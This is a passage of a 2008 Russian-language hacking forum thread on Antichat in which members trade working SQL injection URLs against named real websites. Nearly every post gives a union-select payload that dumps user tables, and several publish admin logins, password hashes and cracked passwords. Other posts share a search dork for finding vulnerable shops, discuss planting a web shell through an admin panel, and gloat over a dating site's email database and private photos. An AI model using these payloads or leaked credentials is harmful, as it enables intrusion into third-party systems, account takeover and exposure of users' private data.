HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5691  
Старый 12.06.2008, 16:00
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию

Цитата:
Сообщение от BlackSun  
http://woonsanmall.com/shop/board/view.php?id=wdietinfo&ws=1&s=4_4&no=-1/**/union/**/select/**/0,1,2,name,password,5,6,7+from+gd_member/*

Дорк: inurl:"view.php?id=" inurl:"shop"
это не дорк. сайтов с такими урлами много
 
Ответить с цитированием

  #5692  
Старый 12.06.2008, 16:34
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Код:
http://proge.info/news/news.php?id=-1+union+select+1,2,user_password,username,5,6+from+users+limit+1,1/*
Могли бы хоть в библиотеке программистов не проглядеть это =\

====================================

Код:
http://www.zerecords.com/artists/artist.php?id=-19+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12+from+user/*
Логин - admin, пароль - все остальное... Чет меня сначала смущала надпись сверху что я аж незаметил написанного чуть ниже 23...

Последний раз редактировалось SUBJECT617; 12.06.2008 в 17:55..
 
Ответить с цитированием

  #5693  
Старый 12.06.2008, 17:57
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами: 9963383

Репутация: 140
По умолчанию

Код:
http://torrentz.ru/search.php?kwds=ss'+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*&cat=0
 
Ответить с цитированием

  #5694  
Старый 12.06.2008, 18:09
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Код:
http://videoart.virtualmuseum.ca/artist.php?id=-13+union+select+1,username,user_password,user_email,5,6,7,8,9,10+from+drupal_DEV.bb_users+limit+0,1/*
About admin=) Красиво выдано.. Есть еще столбец user_icq. База кажется большая, я только непонял чо эт за сайт. Типа youtube вроде...
 
Ответить с цитированием

  #5695  
Старый 12.06.2008, 19:13
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами: 9963383

Репутация: 140
По умолчанию

Код:
http://www.afrodita.ru/fastsearch.php?genderme=1&genderyouu=2&foto=1&intim=0&age1=&age2=0'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,passw),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+USERS/*
красота
большая база мыл.. если покапаться - можно найти интимные фотки
 
Ответить с цитированием

  #5696  
Старый 12.06.2008, 19:35
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
С нами: 9875274

Репутация: 91
По умолчанию

Код:
http://www.warconent.com/artist.php?id=-12+union+select+1,phpQid,passwd,4,5,6,7,8,9,10,11,12,13,14+from+phpqadmin/*
Почемуто столбца с username небыло...
 
Ответить с цитированием

  #5697  
Старый 12.06.2008, 20:38
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
С нами: 9450895

Репутация: 41
По умолчанию

http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e


http://psyedu.ru/admin

Мона через создании статьи залить shell???
 
Ответить с цитированием

  #5698  
Старый 12.06.2008, 20:40
s_p_a_m
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами: 9607837

Репутация: 158
По умолчанию

_http://www.bsigroup.ru/outgoing/news.php?id=0%27+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,_login_xz,_pass_xz),10+from+_system_use r/*

loginassword в MD5

salzman:gctdlj
svetlana:789258

два штуки удалось расшифровать

Последний раз редактировалось s_p_a_m; 12.06.2008 в 20:43..
 
Ответить с цитированием

  #5699  
Старый 12.06.2008, 20:50
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от tor4)  
http://psyedu.ru/rview.php?view=-1+union+select+1,2,login,user_password,5,6,7+from+ user/*
maxwell 1q2w3e


http://psyedu.ru/admin

Мона через создании статьи залить shell???
Можно,если админка php или ещё какая,но не html =_=.
Мне чето чаще попадаются именно хтмл =_=.Попробуй через аплоад(хотя врядли получицо).А вообще в каждой админке,если она не самописная,есь свои дыры =_=,а то придёццо искать исходники =________________=

Последний раз редактировалось Велемир; 12.06.2008 в 20:53..
 
Ответить с цитированием

  #5700  
Старый 12.06.2008, 21:33
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
С нами: 9457097

Репутация: 133
По умолчанию

просто обыныя страница

Код:
http://hayam.spinners.ru/view_thisf.php?i=-681%20union%20select%201,version(),3,4/*
VER:4.0.27-max-log
DB:zagorsk5
DBUSER:zagorsk5@v16.valuehost.ru
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.